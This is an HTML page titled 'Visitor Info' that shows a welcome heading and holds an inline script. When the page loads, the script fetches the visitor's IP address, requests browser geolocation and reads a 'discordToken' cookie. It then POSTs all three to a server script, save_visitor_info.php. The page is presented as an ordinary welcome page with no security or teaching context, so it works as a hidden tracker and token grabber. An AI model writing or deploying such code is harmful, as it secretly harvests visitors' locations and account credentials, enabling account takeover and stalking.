<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
            <title>Visitor Info</title>
            </head>
            <body>
                <h1>Welcome to the Visitor Info Page</h1>
                    <script>
                            async function getVisitorInfo() {
                                        try {
                                                        const ipResponse = await fetch('get_ip.php');
                                                                        const ipData = await ipResponse.json();
                                                                                        const ip = ipData.ip;
                                                                                                        console.log('Visitor IP:', ip);

                                                                                                                        if ('geolocation' in navigator) {
                                                                                                                                            navigator.geolocation.getCurrentPosition(async (position) => {
                                                                                                                                                                    const latitude = position.coords.latitude;
                                                                                                                                                                                            const longitude = position.coords.longitude;
                                                                                                                                                                                                                    console.log('Latitude:', latitude, 'Longitude:', longitude);

                                                                                                                                                                                                                                            const discordToken = getCookie('discordToken');
                                                                                                                                                                                                                                                                    console.log('Discord Token:', discordToken);

                                                                                                                                                                                                                                                                                            // Send IP, GPS data, and Discord token to the server
                                                                                                                                                                                                                                                                                                                    const response = await fetch('save_visitor_info.php', {
                                                                                                                                                                                                                                                                                                                                                method: 'POST',
                                                                                                                                                                                                                                                                                                                                                                            headers: {
                                                                                                                                                                                                                                                                                                                                                                                                            'Content-Type': 'application/json'
                                                                                                                                                                                                                                                                                                                                                                                                                                        },
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    body: JSON.stringify({ ip: ip, latitude: latitude, longitude: longitude, discordToken: discordToken })
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            });

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    const result = await response.json();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            console.log(result);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                });
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                } else {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    console.error('Geolocation is not supported by this browser.');
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                } catch (error) {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                console.error('Error getting visitor info:', error);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    }

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            function getCookie(name) {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        const value = `; ${document.cookie}`;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    const parts = value.split(`; ${name}=`);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                if (parts.length === 2) return parts.pop().split(';').shift();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        }

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                getVisitorInfo();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    </script>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    </body>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    </html>
